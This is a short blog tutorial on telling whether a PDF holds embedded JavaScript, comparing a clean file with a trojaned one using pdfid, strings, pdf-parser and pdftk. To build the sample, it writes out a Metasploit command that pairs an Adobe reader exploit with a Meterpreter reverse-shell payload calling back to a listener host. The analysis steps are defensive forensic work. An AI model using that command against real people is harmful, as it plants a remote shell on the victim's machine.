Analyzing PDF Contains a Trojan

Introduction :

On this occasion I will write some stages of how to analyze a document file extension *.PDF to Determine Whether they were malicious or not.
This happened some time ago when I tried to download a study guide book and then the file is detected by anti-virus that I use. this creates great suspicion and then I try to analyze the file, and my guess is true in the document there is a java script which turns a script payload is wrapped into the document. This was some of the steps that I did to analyze.

I would do a comparison between a clean PDF document with a document containing a trojan.

Equipment :
1. pdfid
2. pdf-parser
3. pdftk.  'apt-get install pdftk'
4. strings

in the first stage I will analyze the document "analysis.pdf" that is not interrupted by trojan.


OK, now let's go it!
test a pdf file

# pdfid analysis.pdf


the output looks, we just need to pay attention to the line JS / Java Script and turns of the output you see above shows that the document is free from the presence of the insertion trojan. it proved the value displayed on the line JS / Java Script is "0"

so, it means we do not need to analyze further :)

then let's try to analyze a document containing trojans, and here I use metasploit to manipulate trojan into a pdf

# msfcli exploit/windows/browser/adobe_media_newplayer PAYLOAD=windows/meterpreter/reverse_tcp SRVHOST=192.168.1.3 SRVPORT=4455 URIPATH=/ LHOST=192.168.1.3 LPORT=4444 E



Next try to download the file


pdf version that is in use metasploit to wrap trojan into the document using the 1.5 version shown in the image above.

ok, then do the test file
# pdfid trojanPDF.pdf


seen the value shown in line JS / Java Script is "1", meaning that there is a pdf file javascript command, then let's look further.

subsequently using the "strings" to show the line of java script
# strings trojanPDF.pdf


I just showed multiple outputs and no java script that appears in the form of text, this may be an attempt metasploit java to encrypt text into a form that is more difficult, hmm I like metasploit :)

next, parse the PDF document
# pdf-parser -f trojanPDF.pdf

-f = pass stream object through filters


above also do not see any of his text javascript, metasploit make a very good encryption :)

and here I will create duplicate documents and remove all the encoding of a document "trojanPDF.pdf" and copy it to the new document "trojanPDF-2.pdf"

# pdftk trojanPDF.pdf output trojanPDF-2.pdf uncompress


subsequently using the "strings" to display the look of printable documents *.pdf


yuhuu, now we find the JavaScript text in it as shown in the picture above.

I think I need to download other guide books that are not infected with trojan :)

Regards
Hidemichi-Hiroyuki a.k.a [H2]

Comments

Popular posts from this blog

Decrypt MD5 $Wordpress

Exploit Samba "SmbClient"

Configure Pure-FTP on Kali Linux